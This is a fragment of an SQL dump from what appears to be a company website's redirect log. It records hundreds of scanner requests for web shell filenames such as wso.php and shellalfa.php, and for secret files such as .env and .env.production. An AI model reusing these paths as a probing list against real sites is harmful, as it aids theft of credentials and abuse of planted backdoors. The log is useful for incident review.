00:00:00',301),(48366,'http://mail.3s-technologies.com.tr/tr/aj.php',NULL,'','',6,0,'2025-10-25 21:56:15','0000-00-00 00:00:00',301),(48367,'http://mail.3s-technologies.com.tr/tr/opts.php',NULL,'','',11,0,'2025-10-25 21:56:16','0000-00-00 00:00:00',301),(48368,'http://mail.3s-technologies.com.tr/tr/filer.php',NULL,'','',3,0,'2025-10-25 21:56:17','0000-00-00 00:00:00',301),(48369,'http://mail.3s-technologies.com.tr/tr/en0.php',NULL,'','',2,0,'2025-10-25 21:56:19','0000-00-00 00:00:00',301),(48370,'http://mail.3s-technologies.com.tr/tr/bless3.php',NULL,'','',10,0,'2025-10-25 21:56:26','0000-00-00 00:00:00',301),(48371,'http://mail.3s-technologies.com.tr/tr/doti.php',NULL,'','',5,0,'2025-10-25 21:56:28','0000-00-00 00:00:00',301),(48372,'http://mail.3s-technologies.com.tr/tr/ea.php',NULL,'','',2,0,'2025-10-25 21:57:11','0000-00-00 00:00:00',301),(48373,'http://mail.3s-technologies.com.tr/tr/hi.php',NULL,'','',11,0,'2025-10-25 21:57:18','0000-00-00 00:00:00',301),(48374,'http://mail.3s-technologies.com.tr/tr/article.php',NULL,'','',5,0,'2025-10-25 21:57:22','0000-00-00 00:00:00',301),(48375,'http://mail.3s-technologies.com.tr/tr/install.php',NULL,'','',63,0,'2025-10-25 21:57:23','0000-00-00 00:00:00',301),(48376,'http://mail.3s-technologies.com.tr/tr/bak.php',NULL,'','',13,0,'2025-10-25 21:57:25','0000-00-00 00:00:00',301),(48377,'http://mail.3s-technologies.com.tr/tr/ini.php',NULL,'','',19,0,'2025-10-25 21:57:26','0000-00-00 00:00:00',301),(48378,'http://mail.3s-technologies.com.tr/tr/zde.php',NULL,'','',3,0,'2025-10-25 21:57:29','0000-00-00 00:00:00',301),(48379,'http://mail.3s-technologies.com.tr/tr/ifm.php',NULL,'','',5,0,'2025-10-25 21:57:30','0000-00-00 00:00:00',301),(48380,'http://mail.3s-technologies.com.tr/tr/redi.php',NULL,'','',3,0,'2025-10-25 21:57:31','0000-00-00 00:00:00',301),(48381,'http://mail.3s-technologies.com.tr/tr/fns.php',NULL,'','',2,0,'2025-10-25 21:57:32','0000-00-00 00:00:00',301),(48382,'http://mail.3s-technologies.com.tr/tr/pent.php',NULL,'','',2,0,'2025-10-25 21:57:33','0000-00-00 00:00:00',301),(48383,'http://mail.3s-technologies.com.tr/tr/wsx.php',NULL,'','',2,0,'2025-10-25 21:57:34','0000-00-00 00:00:00',301),(48384,'http://mail.3s-technologies.com.tr/tr/r79.php',NULL,'','',2,0,'2025-10-25 21:57:35','0000-00-00 00:00:00',301),(48385,'http://mail.3s-technologies.com.tr/tr/mpxct.php',NULL,'','',4,0,'2025-10-25 21:57:36','0000-00-00 00:00:00',301),(48386,'http://mail.3s-technologies.com.tr/tr/x3.php',NULL,'','',3,0,'2025-10-25 21:57:37','0000-00-00 00:00:00',301),(48387,'http://mail.3s-technologies.com.tr/tr/wan.php',NULL,'','',2,0,'2025-10-25 21:57:38','0000-00-00 00:00:00',301),(48388,'http://mail.3s-technologies.com.tr/tr/ouh.php',NULL,'','',7,0,'2025-10-25 21:57:39','0000-00-00 00:00:00',301),(48389,'http://mail.3s-technologies.com.tr/tr/133.php',NULL,'','',3,0,'2025-10-25 21:57:40','0000-00-00 00:00:00',301),(48390,'http://mail.3s-technologies.com.tr/tr/x0.php',NULL,'','',2,0,'2025-10-25 21:57:41','0000-00-00 00:00:00',301),(48391,'http://mail.3s-technologies.com.tr/tr/wolv.php',NULL,'','',4,0,'2025-10-25 21:57:43','0000-00-00 00:00:00',301),(48392,'http://mail.3s-technologies.com.tr/tr/av.php.php',NULL,'','',2,0,'2025-10-25 21:57:44','0000-00-00 00:00:00',301),(48393,'https://3s-technologies.com.tr/tr/.gitignore',NULL,'','',4,0,'2025-10-26 03:03:18','0000-00-00 00:00:00',301),(48394,'http://mail.3s-technologies.com.tr/tr/link.php',NULL,'','',27,0,'2025-10-26 08:24:06','0000-00-00 00:00:00',301),(48395,'http://mail.3s-technologies.com.tr/tr/function.php',NULL,'','',10,0,'2025-10-26 08:24:10','0000-00-00 00:00:00',301),(48396,'http://mail.3s-technologies.com.tr/tr/gecko-litespeed.php',NULL,'','',2,0,'2025-10-26 08:24:20','0000-00-00 00:00:00',301),(48397,'http://mail.3s-technologies.com.tr/tr/brand.php',NULL,'','',3,0,'2025-10-26 08:24:43','0000-00-00 00:00:00',301),(48398,'http://mail.3s-technologies.com.tr/tr/zfile.php/wso.php',NULL,'','',1,0,'2025-10-26 08:24:46','0000-00-00 00:00:00',301),(48399,'http://mail.3s-technologies.com.tr/tr/css.php/bes.php?p=',NULL,'','',1,0,'2025-10-26 08:24:47','0000-00-00 00:00:00',301),(48400,'http://mail.3s-technologies.com.tr/tr/nc4.php/ty.php?p=',NULL,'','',1,0,'2025-10-26 08:24:49','0000-00-00 00:00:00',301),(48401,'http://mail.3s-technologies.com.tr/tr/wso.php/mar.php',NULL,'','',1,0,'2025-10-26 08:24:51','0000-00-00 00:00:00',301),(48402,'http://mail.3s-technologies.com.tr/tr/ant.php',NULL,'','',10,0,'2025-10-26 08:24:59','0000-00-00 00:00:00',301),(48403,'http://mail.3s-technologies.com.tr/tr/fm1.php',NULL,'','',1,0,'2025-10-26 08:25:07','0000-00-00 00:00:00',301),(48404,'http://mail.3s-technologies.com.tr/tr/gdn.php',NULL,'','',26,0,'2025-10-26 08:25:12','0000-00-00 00:00:00',301),(48405,'http://mail.3s-technologies.com.tr/tr/m.php',NULL,'','',48,0,'2025-10-26 08:25:24','0000-00-00 00:00:00',301),(48406,'http://mail.3s-technologies.com.tr/tr/ki1k.php',NULL,'','',1,0,'2025-10-26 08:25:25','0000-00-00 00:00:00',301),(48407,'http://mail.3s-technologies.com.tr/tr/footer.php',NULL,'','',15,0,'2025-10-26 08:25:28','0000-00-00 00:00:00',301),(48408,'http://mail.3s-technologies.com.tr/tr/db.php',NULL,'','',37,0,'2025-10-26 08:25:30','0000-00-00 00:00:00',301),(48409,'http://mail.3s-technologies.com.tr/tr/aks.php',NULL,'','',1,0,'2025-10-26 08:25:32','0000-00-00 00:00:00',301),(48410,'http://mail.3s-technologies.com.tr/tr/f.php',NULL,'','',11,0,'2025-10-26 08:25:34','0000-00-00 00:00:00',301),(48411,'http://mail.3s-technologies.com.tr/tr/twenty.php',NULL,'','',1,0,'2025-10-26 08:25:35','0000-00-00 00:00:00',301),(48412,'http://mail.3s-technologies.com.tr/tr/wp-files.php',NULL,'','',3,0,'2025-10-26 08:25:36','0000-00-00 00:00:00',301),(48413,'http://mail.3s-technologies.com.tr/tr/cloud.php',NULL,'','',5,0,'2025-10-26 08:25:37','0000-00-00 00:00:00',301),(48414,'http://mail.3s-technologies.com.tr/tr/mpvloi.php',NULL,'','',1,0,'2025-10-26 08:25:38','0000-00-00 00:00:00',301),(48415,'http://mail.3s-technologies.com.tr/tr/update_with_pics.php',NULL,'','',2,0,'2025-10-26 08:25:39','0000-00-00 00:00:00',301),(48416,'http://mail.3s-technologies.com.tr/tr/asa.php',NULL,'','',2,0,'2025-10-26 08:25:43','0000-00-00 00:00:00',301),(48417,'http://mail.3s-technologies.com.tr/tr/lla.php',NULL,'','',2,0,'2025-10-26 08:25:44','0000-00-00 00:00:00',301),(48418,'https://3s-technologies.com.tr/tr/php.php',NULL,'','',1,0,'2025-10-26 10:27:38','0000-00-00 00:00:00',301),(48419,'https://3s-technologies.com.tr/tr/phpversion.php',NULL,'','',1,0,'2025-10-26 10:27:40','0000-00-00 00:00:00',301),(48420,'http://www.3s-technologies.com.tr/tr/mob.php',NULL,'','',1,0,'2025-10-26 10:54:31','0000-00-00 00:00:00',301),(48421,'http://www.3s-technologies.com.tr/tr/alfa_data/index.php?p=',NULL,'','',1,0,'2025-10-26 10:54:33','0000-00-00 00:00:00',301),(48422,'http://www.3s-technologies.com.tr/tr/d2.php',NULL,'','',3,0,'2025-10-26 10:54:37','0000-00-00 00:00:00',301),(48423,'http://www.3s-technologies.com.tr/tr/f35.php',NULL,'','',20,0,'2025-10-26 10:54:45','0000-00-00 00:00:00',301),(48424,'http://www.3s-technologies.com.tr/tr/admin/upload/css.php',NULL,'','',2,0,'2025-10-26 10:54:50','0000-00-00 00:00:00',301),(48425,'http://www.3s-technologies.com.tr/tr/wp-admin/css/wp-conflg.php?p=',NULL,'','',6,0,'2025-10-26 10:55:10','0000-00-00 00:00:00',301),(48426,'http://www.3s-technologies.com.tr/tr/wp-includes/js/codemirror/index.php',NULL,'','',7,0,'2025-10-26 10:55:11','0000-00-00 00:00:00',301),(48427,'http://www.3s-technologies.com.tr/tr/go.php?p=',NULL,'','',2,0,'2025-10-26 10:55:14','0000-00-00 00:00:00',301),(48428,'http://www.3s-technologies.com.tr/tr/public_html',NULL,'','',2,0,'2025-10-26 10:55:16','0000-00-00 00:00:00',301),(48429,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/topxoh/wdr.php',NULL,'','',2,0,'2025-10-26 10:55:22','0000-00-00 00:00:00',301),(48430,'http://www.3s-technologies.com.tr/tr/wp-includes/text/diff/engine/about.php',NULL,'','',8,0,'2025-10-26 10:55:25','0000-00-00 00:00:00',301),(48431,'http://www.3s-technologies.com.tr/tr/wp-includes/id3/rk2.php',NULL,'','',3,0,'2025-10-26 10:55:27','0000-00-00 00:00:00',301),(48432,'http://www.3s-technologies.com.tr/tr/alfanew.php',NULL,'','',3,0,'2025-10-26 10:55:31','0000-00-00 00:00:00',301),(48433,'http://www.3s-technologies.com.tr/tr/inputs.php?p=',NULL,'','',1,0,'2025-10-26 10:55:32','0000-00-00 00:00:00',301),(48434,'http://www.3s-technologies.com.tr/tr/wp-content/themes/wp-pridmag/init.php',NULL,'','',4,0,'2025-10-26 10:55:39','0000-00-00 00:00:00',301),(48435,'http://www.3s-technologies.com.tr/tr/wp-includes/autoload_classmap.php',NULL,'','',2,0,'2025-10-26 10:55:41','0000-00-00 00:00:00',301),(48436,'http://www.3s-technologies.com.tr/tr/wp-content/403.php',NULL,'','',2,0,'2025-10-26 10:55:42','0000-00-00 00:00:00',301),(48437,'http://www.3s-technologies.com.tr/tr/css/colors/coffee/index.php',NULL,'','',2,0,'2025-10-26 10:55:43','0000-00-00 00:00:00',301),(48438,'http://www.3s-technologies.com.tr/tr/goat1.php',NULL,'','',3,0,'2025-10-26 10:55:52','0000-00-00 00:00:00',301),(48439,'http://www.3s-technologies.com.tr/tr/wp-cron.php',NULL,'','',2,0,'2025-10-26 10:55:55','0000-00-00 00:00:00',301),(48440,'http://www.3s-technologies.com.tr/tr/yanz.php',NULL,'','',2,0,'2025-10-26 10:55:56','0000-00-00 00:00:00',301),(48441,'http://www.3s-technologies.com.tr/tr/config.php',NULL,'','',11,0,'2025-10-26 10:55:57','0000-00-00 00:00:00',301),(48442,'http://www.3s-technologies.com.tr/tr/network.php',NULL,'','',3,0,'2025-10-26 10:55:58','0000-00-00 00:00:00',301),(48443,'http://www.3s-technologies.com.tr/tr/wp-2019.php',NULL,'','',3,0,'2025-10-26 10:55:59','0000-00-00 00:00:00',301),(48444,'http://www.3s-technologies.com.tr/tr/wp-includes/ixr/admin.php',NULL,'','',2,0,'2025-10-26 10:56:02','0000-00-00 00:00:00',301),(48445,'http://www.3s-technologies.com.tr/tr/wp-includes/theme-compat/wp-login.php',NULL,'','',4,0,'2025-10-26 10:56:03','0000-00-00 00:00:00',301),(48446,'http://www.3s-technologies.com.tr/tr/mail.php',NULL,'','',10,0,'2025-10-26 10:56:06','0000-00-00 00:00:00',301),(48447,'http://www.3s-technologies.com.tr/tr/wp-includes/system_log.php',NULL,'','',2,0,'2025-10-26 10:56:07','0000-00-00 00:00:00',301),(48448,'http://www.3s-technologies.com.tr/tr/manager.php?p=',NULL,'','',2,0,'2025-10-26 10:56:13','0000-00-00 00:00:00',301),(48449,'http://www.3s-technologies.com.tr/tr/plugins/pwnd/as.php',NULL,'','',2,0,'2025-10-26 10:56:14','0000-00-00 00:00:00',301),(48450,'http://www.3s-technologies.com.tr/tr/wp-configs.php',NULL,'','',8,0,'2025-10-26 10:56:16','0000-00-00 00:00:00',301),(48451,'http://www.3s-technologies.com.tr/tr/wp-includes/html-api/wp-conflg.php?p=',NULL,'','',2,0,'2025-10-26 10:56:17','0000-00-00 00:00:00',301),(48452,'http://www.3s-technologies.com.tr/tr/wp-includes/js/crop/zmfm.php',NULL,'','',2,0,'2025-10-26 10:56:18','0000-00-00 00:00:00',301),(48453,'http://www.3s-technologies.com.tr/tr/wp-includes/rest-api/fields/index.php',NULL,'','',2,0,'2025-10-26 10:56:19','0000-00-00 00:00:00',301),(48454,'http://www.3s-technologies.com.tr/tr/index/fucku.php',NULL,'','',2,0,'2025-10-26 10:56:20','0000-00-00 00:00:00',301),(48455,'http://www.3s-technologies.com.tr/tr/upload/wp-info.php',NULL,'','',2,0,'2025-10-26 10:56:21','0000-00-00 00:00:00',301),(48456,'http://www.3s-technologies.com.tr/tr/post.php',NULL,'','',4,0,'2025-10-26 10:56:22','0000-00-00 00:00:00',301),(48457,'http://www.3s-technologies.com.tr/tr/.well-known/acme-challenge/admin.php',NULL,'','',5,0,'2025-10-26 10:56:23','0000-00-00 00:00:00',301),(48458,'http://www.3s-technologies.com.tr/tr/bless4.php',NULL,'','',4,0,'2025-10-26 10:56:28','0000-00-00 00:00:00',301),(48459,'http://www.3s-technologies.com.tr/tr/bless6.php',NULL,'','',1,0,'2025-10-26 10:56:30','0000-00-00 00:00:00',301),(48460,'http://www.3s-technologies.com.tr/tr/bless7.php',NULL,'','',1,0,'2025-10-26 10:56:31','0000-00-00 00:00:00',301),(48461,'http://www.3s-technologies.com.tr/tr/class21.php',NULL,'','',1,0,'2025-10-26 10:56:34','0000-00-00 00:00:00',301),(48462,'http://www.3s-technologies.com.tr/tr/enclas.php',NULL,'','',1,0,'2025-10-26 10:56:40','0000-00-00 00:00:00',301),(48463,'http://3s-technologies.com.tr/tr/gecko-litespeed.php',NULL,'','',10,0,'2025-10-26 11:03:25','0000-00-00 00:00:00',301),(48464,'http://3s-technologies.com.tr/tr/zfile.php/wso.php',NULL,'','',1,0,'2025-10-26 11:03:52','0000-00-00 00:00:00',301),(48465,'http://3s-technologies.com.tr/tr/css.php/bes.php?p=',NULL,'','',1,0,'2025-10-26 11:03:53','0000-00-00 00:00:00',301),(48466,'http://3s-technologies.com.tr/tr/nc4.php/ty.php?p=',NULL,'','',1,0,'2025-10-26 11:03:55','0000-00-00 00:00:00',301),(48467,'http://3s-technologies.com.tr/tr/wso.php/mar.php',NULL,'','',1,0,'2025-10-26 11:03:57','0000-00-00 00:00:00',301),(48468,'http://3s-technologies.com.tr/tr/mpxct.php',NULL,'','',10,0,'2025-10-26 11:03:59','0000-00-00 00:00:00',301),(48469,'http://3s-technologies.com.tr/tr/twenty.php',NULL,'','',3,0,'2025-10-26 11:04:40','0000-00-00 00:00:00',301),(48470,'http://3s-technologies.com.tr/tr/update_with_pics.php',NULL,'','',1,0,'2025-10-26 11:04:43','0000-00-00 00:00:00',301),(48471,'http://3s-technologies.com.tr/tr/kal.php',NULL,'','',7,0,'2025-10-26 11:04:44','0000-00-00 00:00:00',301),(48472,'http://3s-technologies.com.tr/tr/zze.php',NULL,'','',1,0,'2025-10-26 11:04:45','0000-00-00 00:00:00',301),(48473,'http://3s-technologies.com.tr/tr/led.php',NULL,'','',3,0,'2025-10-26 11:04:46','0000-00-00 00:00:00',301),(48474,'http://3s-technologies.com.tr/tr/asa.php',NULL,'','',9,0,'2025-10-26 11:04:47','0000-00-00 00:00:00',301),(48475,'http://3s-technologies.com.tr/tr/lla.php',NULL,'','',1,0,'2025-10-26 11:04:48','0000-00-00 00:00:00',301),(48476,'http://3s-technologies.com.tr/tr/wrt.php',NULL,'','',45,0,'2025-10-26 11:04:49','0000-00-00 00:00:00',301),(48477,'http://3s-technologies.com.tr/tr/wp-content/plugins/wp-apxupx.php?apx=upx',NULL,'','',5,0,'2025-10-26 15:08:23','0000-00-00 00:00:00',301),(48478,'http://3s-technologies.com.tr/tr/wp-content/plugins/contact-form-7/includes/js/jquery-ui/themes/smoothness/admin.php',NULL,'','',5,0,'2025-10-26 15:10:50','0000-00-00 00:00:00',301),(48479,'http://3s-technologies.com.tr/tr/wp-admin/includes/class-wp-privacy-policy-content-https.php',NULL,'','',2,0,'2025-10-26 15:15:23','0000-00-00 00:00:00',301),(48480,'http://3s-technologies.com.tr/tr/wp-includes/images/smilies/techl.php',NULL,'','',2,0,'2025-10-26 15:15:23','0000-00-00 00:00:00',301),(48481,'http://3s-technologies.com.tr/tr/wp-includes/bdkr28_asq3dm1u.php',NULL,'','',2,0,'2025-10-26 15:15:24','0000-00-00 00:00:00',301),(48482,'http://3s-technologies.com.tr/tr/wp-includes/widgets/ff2.php',NULL,'','',2,0,'2025-10-26 15:15:25','0000-00-00 00:00:00',301),(48483,'http://3s-technologies.com.tr/tr/wp-admin/maint/ff2.php',NULL,'','',2,0,'2025-10-26 15:15:26','0000-00-00 00:00:00',301),(48484,'http://3s-technologies.com.tr/tr/admin-filters-part.php',NULL,'','',2,0,'2025-10-26 15:15:27','0000-00-00 00:00:00',301),(48485,'http://3s-technologies.com.tr/tr/mark.php',NULL,'','',2,0,'2025-10-26 15:15:29','0000-00-00 00:00:00',301),(48486,'http://3s-technologies.com.tr/tr/henla-68-apt-66x66.php',NULL,'','',2,0,'2025-10-26 15:15:31','0000-00-00 00:00:00',301),(48487,'http://3s-technologies.com.tr/tr/wp-includes/images/crystal/filed.php',NULL,'','',2,0,'2025-10-26 15:15:33','0000-00-00 00:00:00',301),(48488,'http://3s-technologies.com.tr/tr/.well-known/akp.php',NULL,'','',2,0,'2025-10-26 15:15:36','0000-00-00 00:00:00',301),(48489,'http://3s-technologies.com.tr/tr/wp-admin/user/langsung-pointer.php',NULL,'','',2,0,'2025-10-26 15:15:37','0000-00-00 00:00:00',301),(48490,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/blue/az.php',NULL,'','',2,0,'2025-10-26 15:15:38','0000-00-00 00:00:00',301),(48491,'http://3s-technologies.com.tr/tr/alfaajapet.php',NULL,'','',2,0,'2025-10-26 15:15:39','0000-00-00 00:00:00',301),(48492,'http://3s-technologies.com.tr/tr/bdkr28_shell.php',NULL,'','',3,0,'2025-10-26 15:15:41','0000-00-00 00:00:00',301),(48493,'http://3s-technologies.com.tr/tr/class-wp-ms-themes-list-table-other.php',NULL,'','',2,0,'2025-10-26 15:15:42','0000-00-00 00:00:00',301),(48494,'http://3s-technologies.com.tr/tr/wp-includes/images/media/newfl.php',NULL,'','',2,0,'2025-10-26 15:15:46','0000-00-00 00:00:00',301),(48495,'http://3s-technologies.com.tr/tr/bdkr28_pnbi8jhp.php',NULL,'','',2,0,'2025-10-26 15:15:48','0000-00-00 00:00:00',301),(48496,'http://3s-technologies.com.tr/tr/bdkr28_jblnamqu.php',NULL,'','',2,0,'2025-10-26 15:15:50','0000-00-00 00:00:00',301),(48497,'http://3s-technologies.com.tr/tr/@.php',NULL,'','',2,0,'2025-10-26 15:15:52','0000-00-00 00:00:00',301),(48498,'http://3s-technologies.com.tr/tr/shellalfa.php',NULL,'','',6,0,'2025-10-26 16:07:49','0000-00-00 00:00:00',301),(48499,'http://3s-technologies.com.tr/tr/zde.php',NULL,'','',9,0,'2025-10-26 16:10:00','0000-00-00 00:00:00',301),(48500,'http://3s-technologies.com.tr/tr/ifm.php',NULL,'','',10,0,'2025-10-26 16:10:02','0000-00-00 00:00:00',301),(48501,'http://3s-technologies.com.tr/tr/redi.php',NULL,'','',9,0,'2025-10-26 16:10:02','0000-00-00 00:00:00',301),(48502,'http://3s-technologies.com.tr/tr/fns.php',NULL,'','',6,0,'2025-10-26 16:10:03','0000-00-00 00:00:00',301),(48503,'http://3s-technologies.com.tr/tr/pent.php',NULL,'','',7,0,'2025-10-26 16:10:04','0000-00-00 00:00:00',301),(48504,'http://3s-technologies.com.tr/tr/wsx.php',NULL,'','',10,0,'2025-10-26 16:10:05','0000-00-00 00:00:00',301),(48505,'http://3s-technologies.com.tr/tr/r79.php',NULL,'','',6,0,'2025-10-26 16:10:06','0000-00-00 00:00:00',301),(48506,'http://3s-technologies.com.tr/tr/x3.php',NULL,'','',7,0,'2025-10-26 16:10:08','0000-00-00 00:00:00',301),(48507,'http://3s-technologies.com.tr/tr/wan.php',NULL,'','',6,0,'2025-10-26 16:10:09','0000-00-00 00:00:00',301),(48508,'http://3s-technologies.com.tr/tr/rsr.php',NULL,'','',2,0,'2025-10-26 16:10:11','0000-00-00 00:00:00',301),(48509,'http://3s-technologies.com.tr/tr/ouh.php',NULL,'','',12,0,'2025-10-26 16:10:13','0000-00-00 00:00:00',301),(48510,'http://3s-technologies.com.tr/tr/133.php',NULL,'','',26,0,'2025-10-26 16:10:14','0000-00-00 00:00:00',301),(48511,'http://www.3s-technologies.com.tr/tr/inputs.php',NULL,'','',30,0,'2025-10-27 07:32:22','0000-00-00 00:00:00',301),(48512,'http://3s-technologies.com.tr/tr/rh.php',NULL,'','',67,0,'2025-10-27 15:13:24','0000-00-00 00:00:00',301),(48513,'http://3s-technologies.com.tr/tr/storage/.env',NULL,'http://3s-technologies.com.tr/storage/.env','',4,0,'2025-10-27 17:15:56','0000-00-00 00:00:00',301),(48514,'http://3s-technologies.com.tr/en/backend/.env',NULL,'http://3s-technologies.com.tr/backend/.env','',2,0,'2025-10-27 17:44:49','0000-00-00 00:00:00',301),(48515,'http://3s-technologies.com.tr/en/storage/.env',NULL,'http://3s-technologies.com.tr/storage/.env','',1,0,'2025-10-27 17:44:53','0000-00-00 00:00:00',301),(48516,'http://3s-technologies.com.tr/tr/postnews.php',NULL,'','',30,0,'2025-10-28 00:52:56','0000-00-00 00:00:00',301),(48517,'http://3s-technologies.com.tr/tr/hplfuns.php',NULL,'','',71,0,'2025-10-28 00:53:24','0000-00-00 00:00:00',301),(48518,'http://3s-technologies.com.tr/tr/tempfuns.php',NULL,'','',7,0,'2025-10-28 00:53:32','0000-00-00 00:00:00',301),(48519,'http://3s-technologies.com.tr/tr/classfuns.php',NULL,'','',3,0,'2025-10-28 00:53:42','0000-00-00 00:00:00',301),(48520,'http://3s-technologies.com.tr/docker/.env',NULL,'','',3,0,'2025-10-28 07:09:18','0000-00-00 00:00:00',301),(48521,'http://3s-technologies.com.tr/back/.env',NULL,'','',3,0,'2025-10-28 07:10:01','0000-00-00 00:00:00',301),(48522,'http://3s-technologies.com.tr/private/.env',NULL,'','',3,0,'2025-10-28 07:12:42','0000-00-00 00:00:00',301),(48523,'http://3s-technologies.com.tr/fedex/.env',NULL,'','',3,0,'2025-10-28 07:16:33','0000-00-00 00:00:00',301),(48524,'http://3s-technologies.com.tr/.env.dist',NULL,'','',3,0,'2025-10-28 07:20:39','0000-00-00 00:00:00',301),(48525,'http://3s-technologies.com.tr/.env.prod',NULL,'','',3,0,'2025-10-28 07:24:26','0000-00-00 00:00:00',301),(48526,'http://mail.3s-technologies.com.tr/tr/xl2023.php',NULL,'','',3,0,'2025-10-28 07:25:50','0000-00-00 00:00:00',301),(48527,'http://mail.3s-technologies.com.tr/tr/sto.php',NULL,'','',15,0,'2025-10-28 07:25:56','0000-00-00 00:00:00',301),(48528,'http://mail.3s-technologies.com.tr/tr/wp-head.php',NULL,'','',5,0,'2025-10-28 07:26:06','0000-00-00 00:00:00',301),(48529,'http://mail.3s-technologies.com.tr/tr/uploadx.php',NULL,'','',2,0,'2025-10-28 07:26:07','0000-00-00 00:00:00',301),(48530,'http://mail.3s-technologies.com.tr/tr/af4.php',NULL,'','',2,0,'2025-10-28 07:26:13','0000-00-00 00:00:00',301),(48531,'http://mail.3s-technologies.com.tr/tr/.bod/.ll/ss.php',NULL,'','',3,0,'2025-10-28 07:26:16','0000-00-00 00:00:00',301),(48532,'http://mail.3s-technologies.com.tr/tr/men.php',NULL,'','',2,0,'2025-10-28 07:26:36','0000-00-00 00:00:00',301),(48533,'http://mail.3s-technologies.com.tr/tr/uplozyu.php',NULL,'','',3,0,'2025-10-28 07:26:39','0000-00-00 00:00:00',301),(48534,'http://mail.3s-technologies.com.tr/tr/shell.php',NULL,'','',44,0,'2025-10-28 07:26:41','0000-00-00 00:00:00',301),(48535,'http://mail.3s-technologies.com.tr/tr/bala.php',NULL,'','',2,0,'2025-10-28 07:26:45','0000-00-00 00:00:00',301),(48536,'http://mail.3s-technologies.com.tr/tr/file22.php',NULL,'','',8,0,'2025-10-28 07:26:48','0000-00-00 00:00:00',301),(48537,'http://mail.3s-technologies.com.tr/tr/uploat.php',NULL,'','',5,0,'2025-10-28 07:26:57','0000-00-00 00:00:00',301),(48538,'http://mail.3s-technologies.com.tr/tr/oxvrws.php',NULL,'','',3,0,'2025-10-28 07:27:03','0000-00-00 00:00:00',301),(48539,'http://mail.3s-technologies.com.tr/tr/sk25_1.php',NULL,'','',5,0,'2025-10-28 07:27:08','0000-00-00 00:00:00',301),(48540,'http://mail.3s-technologies.com.tr/tr/css/xp.php',NULL,'','',12,0,'2025-10-28 07:27:10','0000-00-00 00:00:00',301),(48541,'http://mail.3s-technologies.com.tr/tr/himu.php',NULL,'','',9,0,'2025-10-28 07:27:12','0000-00-00 00:00:00',301),(48542,'http://mail.3s-technologies.com.tr/tr/tentang_rmol.php',NULL,'','',3,0,'2025-10-28 07:27:18','0000-00-00 00:00:00',301),(48543,'http://3s-technologies.com.tr/enviroments/.env.production',NULL,'','',3,0,'2025-10-28 07:27:41','0000-00-00 00:00:00',301),(48544,'http://3s-technologies.com.tr/cms/.env',NULL,'','',3,0,'2025-10-28 07:29:02','0000-00-00 00:00:00',301),(48545,'http://3s-technologies.com.tr/tr/bge.php',NULL,'','',5,0,'2025-10-28 09:59:34','0000-00-00 00:00:00',301),(48546,'http://3s-technologies.com.tr/tr/kairolin.php',NULL,'','',4,0,'2025-10-28 09:59:37','0000-00-00 00:00:00',301),(48547,'http://3s-technologies.com.tr/tr/siln.php',NULL,'','',11,0,'2025-10-28 09:59:38','0000-00-00 00:00:00',301),(48548,'http://3s-technologies.com.tr/tr/sto.php',NULL,'','',20,0,'2025-10-28 10:34:15','0000-00-00 00:00:00',301),(48549,'http://3s-technologies.com.tr/tr/uploadx.php',NULL,'','',2,0,'2025-10-28 10:34:26','0000-00-00 00:00:00',301),(48550,'http://3s-technologies.com.tr/tr/af4.php',NULL,'','',2,0,'2025-10-28 10:34:32','0000-00-00 00:00:00',301),(48551,'http://3s-technologies.com.tr/tr/men.php',NULL,'','',3,0,'2025-10-28 10:34:54','0000-00-00 00:00:00',301),(48552,'http://3s-technologies.com.tr/tr/uploat.php',NULL,'','',4,0,'2025-10-28 10:35:15','0000-00-00 00:00:00',301),(48553,'http://3s-technologies.com.tr/tr/sk25_1.php',NULL,'','',18,0,'2025-10-28 10:35:27','0000-00-00 00:00:00',301),(48554,'http://3s-technologies.com.tr/tr/himu.php',NULL,'','',8,0,'2025-10-28 10:35:31','0000-00-00 00:00:00',301),(48555,'http://3s-technologies.com.tr/tr/tentang_rmol.php',NULL,'','',2,0,'2025-10-28 10:35:37','0000-00-00 00:00:00',301),(48556,'https://www.3s-technologies.com.tr/tr/img/images.ctfassets.net/h0jtq0wdx190/1esv1daojly5epln3ed4hs/a944fc006a6e6202398e20f8203db5df/landing.svg',NULL,'https://www.3s-technologies.com.tr/img/images.ctfassets.net/h0jtq0wdx190/1esV1dAoJly5EPLN3eD4hs/a944fc006a6e6202398e20f8203db5df/landing.svg','',1,0,'2025-10-28 16:37:37','0000-00-00 00:00:00',301),(48557,'http://3s-technologies.com.tr/tr/jqueryfileupload/server/php/index.php?file=tf2rghf.jpg',NULL,'','',4,0,'2025-10-29 10:56:35','0000-00-00 00:00:00',301),(48558,'http://3s-technologies.com.tr/.env.old',NULL,'','',2,0,'2025-10-30 15:49:02','0000-00-00 00:00:00',301),(48559,'http://3s-technologies.com.tr/cp/.env',NULL,'','',2,0,'2025-10-30 15:49:29','0000-00-00 00:00:00',301),(48560,'http://3s-technologies.com.tr/enviroments/.env',NULL,'','',2,0,'2025-10-30 15:50:45','0000-00-00 00:00:00',301),(48561,'http://3s-technologies.com.tr/sources/.env',NULL,'','',2,0,'2025-10-30 15:51:25','0000-00-00 00:00:00',301),(48562,'http://3s-technologies.com.tr/admin-app/.env',NULL,'','',2,0,'2025-10-30 15:51:43','0000-00-00 00:00:00',301),(48563,'http://3s-technologies.com.tr/system/.env',NULL,'','',2,0,'2025-10-30 15:51:47','0000-00-00 00:00:00',301),(48564,'http://3s-technologies.com.tr/script/.env',NULL,'','',2,0,'2025-10-30 15:52:07','0000-00-00 00:00:00',301),(48565,'http://3s-technologies.com.tr/rest/.env',NULL,'','',2,0,'2025-10-30 15:52:13','0000-00-00 00:00:00',301),(48566,'http://3s-technologies.com.tr/application/.env',NULL,'','',2,0,'2025-10-30 15:52:19','0000-00-00 00:00:00',301),(48567,'http://3s-technologies.com.tr/live_env',NULL,'','',2,0,'2025-10-30 15:52:30','0000-00-00 00:00:00',301),(48568,'http://3s-technologies.com.tr/.env.production',NULL,'','',2,0,'2025-10-30 15:52:35','0000-00-00 00:00:00',301),(48569,'http://3s-technologies.com.tr/.env.development',NULL,'','',2,0,'2025-10-30 15:52:48','0000-00-00 00:00:00',301),(48570,'http://3s-technologies.com.tr/.env.project',NULL,'','',2,0,'2025-10-30 15:53:08','0000-00-00 00:00:00',301),(48571,'http://3s-technologies.com.tr/.env.save',NULL,'','',2,0,'2025-10-30 15:53:31','0000-00-00 00:00:00',301),(48572,'https://3s-technologies.com.tr/en/a',NULL,'','',2,0,'2025-10-30 19:10:03','0000-00-00 